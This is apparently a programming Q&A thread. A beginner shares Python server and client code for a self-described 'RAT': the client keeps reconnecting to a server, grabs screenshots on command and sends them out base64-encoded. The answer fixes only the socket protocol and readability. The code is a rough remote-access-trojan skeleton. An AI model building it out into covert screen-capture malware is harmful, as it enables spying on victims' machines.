# TCP socket program does the same function multiple times

Tags: python, sockets, tcp

**My random "Babbling" :**
So, before I start off, I need you to know that I'm relatively new to Python. I'm sorry if the issue is not with what I think it is with and rather my poor programming. 
So, I was making a simple RAT like program who's functions and stuff I will put into an other project I was working on.

**The Issue :**

I have a Server Program:

```
import sys
import time
import os
import base64
from PIL import ImageGrab
import socket
from subprocess import call
import random
import string

"""==========================================================="""
"""-=-=-=-=-=-=-=-=Making all functions needed=-=-=-=-=-=-=-=-"""
"""==========================================================="""

"""-----------The SEND function----------"""
def send_msg(m):                           #
    clientsocket.send(m.encode("UTF-8"))   #
"""--------------------------------------"""

"""-------------Generates a random word / String-----------------"""
def randomword(length):                                            #
   letters = string.ascii_lowercase                                #
   return ''.join(random.choice(letters) for i in range(length))   #
"""--------------------------------------------------------------"""

"""---------------------------------------"""
def from_client():                          #
    from_c = clientsocket.recv(4096)        #
    from_client = from_c.decode("UTF-8")    #
    return from_client                      #
"""---------------------------------------"""

"""--------------------Recieve the Image----------------------"""
def recv_png():                                                 #
    ss_name = randomword(2) + "frms.png"                        #
    with open(ss_name, 'wb') as file_to_write:                  #
        while True:                                             #
            #data = clientsocket.recv(4096)                     #
            #if not data:                                       #
            #    break                                          #
            decoded_f = base64.b64decode(from_client())         #
            file_to_write.write(decoded_f)                      #
            file_to_write.close()                               #
            break                                               #
"""-----------------------------------------------------------"""

"""==========================================================="""
"""-=-=-=-=-=-=-=-=Establishing a Connection=-=-=-=-=-=-=-=-=-"""
"""==========================================================="""
#Declaring Variables:
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
#ServerSocket Variable
HOST = socket.gethostname()                                        #HOST 
Variable
PORT = 1732                                                        #PORT 
Variable
#Connections:
serversocket.bind((HOST, PORT))
serversocket.listen(1)
print("+=+=+=+=+=+=++=+=+=+=+=+=+Ze' No0B RAT+=+=+=+=+=+=++=+=+=+=+=+=+")
clientsocket, addr = serversocket.accept()
print("Connected to: " + str(addr))
msg = input("What can I do for you?\n")
while True:
    if msg == "screeny":
        send_msg(msg)
        recv_png()
        msg = input("What can I do for you?\n")
```

NOTE: The code still not complete, just tried out the screeny method

And then I have the Client Program:

```
import sys
import time
import os
import base64
from PIL import ImageGrab
import socket
from subprocess import call
import random
import string

"""=============================================================="""
"""-=-=-=-=-=-=-=-=-=-Making all functions needed-=-=-=--=-=-=-=-"""
"""=============================================================="""

"""------Clears the Screen-------"""
def clear():                       #
    if os.name=="nt":              #
        try:                       #
            call(["cls"])          #
        except:                    #
            try:                   #
                os.system("cls")   #
            except:                #
                pass               #
    else:                          #
        try:                       #
            call(["clear"])        #
        except:                    #
            try:                   #
                os.system("clear") #
            except:                #
                pass               #
"""------------------------------"""

"""-------------Generates a random word / String-----------------"""
def randomword(length):                                            #
   letters = string.ascii_lowercase                                #
   return ''.join(random.choice(letters) for i in range(length))   #
"""--------------------------------------------------------------"""

"""---------------------------------------------------------------"""
def connect():                                                      #
    while True:                                                     #
        try:                                                        #
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   #
            s.connect((host, port))                                 #
            return s.makefile('w')                                  #
        except socket.error as e:                                   #
            log("socket error {} reconnecting".format(e))           #
            time.sleep(5)                                           #
"""---------------------------------------------------------------"""

"""-----The SEND function-----"""
def send_msg(m):                #
    s.send(m.encode("UTF-8"))   #
"""---------------------------"""

"""-----------Take a screenshot-----------------"""
def screeny():                                    #
    ss = ImageGrab.grab()                         #
    ss_name = (randomword(4) + "frmc.png")        #
    ss.save(ss_name)                              #
                                                  #
    upload_file(ss_name)                          #
    send_msg("Done.")                             #
"""---------------------------------------------"""

"""---------------------Upload a File---------------------"""
def upload_file(file):                                      #
    with open(file, 'rb') as file_to_send:                  #
        cryptedFile = base64.b64encode(file_to_send.read()) #
        send = s.send(cryptedFile)                          #
        file_to_send.close()                                #
        return send                                         #
"""-------------------------------------------------------"""




"""===================================================================="""
"""-=-=-=-=-=-=-=--=-=-=-=-=Making a connection=-==-=-=--=-=-=-=-=---=-"""
"""===================================================================="""

#Declaring Variables
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   #The Socket Variable
HOST = socket.gethostname()                             #The HOST Variable
PORT = 1732                                             #The PORT Variable
Connected = False
while Connected == False:                               #While not connected
    try:                                                #Try to:
        s.connect((HOST, PORT))                         #Connect
        Connected = True                                #Change Connect Status
    except:                                             #If failed or Error:
        time.sleep(10)                                  #Wait for 10
if Connected == True:                                   #If Connected:
    print("Successfully Connected.")                    #Tell the Client


"""==================+================================================"""
"""-=-=-==-=-=-=-=-=-=-=Do what the Server says=-=-=-=-=-=-=-==-=-=-=-"""
"""==================================================================="""
#Declaring Variables
serv_recv = s.recv(4096)                        #Recieve from Server
serv_said = serv_recv.decode("UTF-8")           #Decode what Server said
#The " if's ":
while serv_said != "quit":
    if serv_said == "screeny":                      #If server said "screeny"
        screeny()                                   #Then Execute the "Screeny" function

    elif serv_said == "clear":                      #Or if Server said "clear"
        clear()                                     #Then execute the "clear" function
```

Also, Incomplete
So here's the thing. When I run both codes and send "screeny" from the Server to the Client, the Client does return "Done." to the Server and asks me what I want, again. But, the client takes multiple Screenshots and send only one. And the the one screenshot that it sends, is incomplete. Like its weird and I can't explain it.
I would really, really appreciate any help from you guys. Please do tell me what I'm doing wrong. I'm still learning.

Answer (score 0, accepted):

Server-side: `from_client()` only reads 4096 bytes from the socket, and `recv_png()` calls `from_client()` only once, so you'll only ever receive the first 4k of the base64-encoded image.

Client-side: the `while serv_said != "quit"` loop never recv's another command from the server. In fact, `serv_said` never changes in that loop...

Your real problem goes much deeper, though. You're trying to implement a [protocol](https://en.wikipedia.org/wiki/Communication_protocol), and for that, among many other things, you need rules as to when either side is done talking, in your specific case, when the image transfer is complete. The simplest way is probably having the sender announce the size of the message beforehand:

```
def send_file(filename):
    with open(filename) as f:
        content = base64.b64encode(f.read())
    content_size = len(content)
    s.send("{:9}".format(content_size))  # send size header
    s.send(content)

def recv_file(filename):
    content_size = int(s.recv(9))  # recv size header
    content = ""
    while len(content) < content_size:
        block = s.recv(4096)
        content += block
    with open(filename, "w") as f:
       f.write(base64.b64decode(content))
       # note: no close - that's done automatically by leaving the "with" block
```

(Side node: for improved readability (and [readability counts](https://www.python.org/dev/peps/pep-0020/)), drop the ASCII art frames around the functions and following [PEP8](https://www.python.org/dev/peps/pep-0008/) has proved very useful. My recommendation for every learner of Python is to read PEP8 carefully, and to reflect on it frequently. It really helps you understand your own code. For my own code, I even have [black](https://github.com/ambv/black) enforce PEP8 for me.)